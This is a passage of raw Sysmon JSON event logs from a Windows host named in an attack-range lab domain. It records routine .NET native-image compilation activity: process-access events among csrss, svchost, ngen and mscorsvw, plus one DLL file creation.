0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:15.029","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1377-5F25-0000-0010A2230F00}","TargetProcessId":"2988","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8450,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:15.029\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1377-5F25-0000-0010A2230F00}\r\nTargetProcessId: 2988\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:15.029","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1377-5F25-0000-0010A2230F00}","TargetProcessId":"2988","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8451,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:15.091\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-001052C40C00}\r\nTargetProcessId: 3100\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:15.091","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-001052C40C00}","TargetProcessId":"3100","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8452,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:15.091\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-001052C40C00}\r\nTargetProcessId: 3100\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:15.091","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-001052C40C00}","TargetProcessId":"3100","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8453,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:15.091\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-001052C40C00}\r\nTargetProcessId: 3100\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:15.091","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-001052C40C00}","TargetProcessId":"3100","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8454,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:15.419\r\nProcessGuid: {E2A3D6B1-1377-5F25-0000-00101A270F00}\r\nProcessId: 3100\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\c1c-0\\System.IO.Log.dll\r\nCreationUtcTime: 2020-08-01 07:02:15.419","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:15.419","ProcessGuid":"{E2A3D6B1-1377-5F25-0000-00101A270F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\c1c-0\\System.IO.Log.dll","CreationUtcTime":"2020-08-01 07:02:15.419","EventReceivedTime":"2020-08-01 07:02:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8455,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:15.451\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1377-5F25-0000-00100B2C0F00}\r\nTargetProcessId: 4388\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:15.451","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1377-5F25-0000-00100B2C0F00}","TargetProcessId":"4388","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8456,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:15.451\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1377-5F25-0000-00100B2C0F00}\r\nTargetProcessId: 4388\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:15.451","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1377-5F25-0000-00100B2C0F00}","TargetProcessId":"4388","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8457,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:15.466\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1377-5F25-0000-00100B2C0F00}\r\nTargetProcessId: 4388\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:15.466","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1377-5F25-0000-00100B2C0F00}","TargetProcessId":"4388","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8458,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:15.498\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1341-5F25-0000-0010AE840D00}\r\nTargetProcessId: 4748\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: 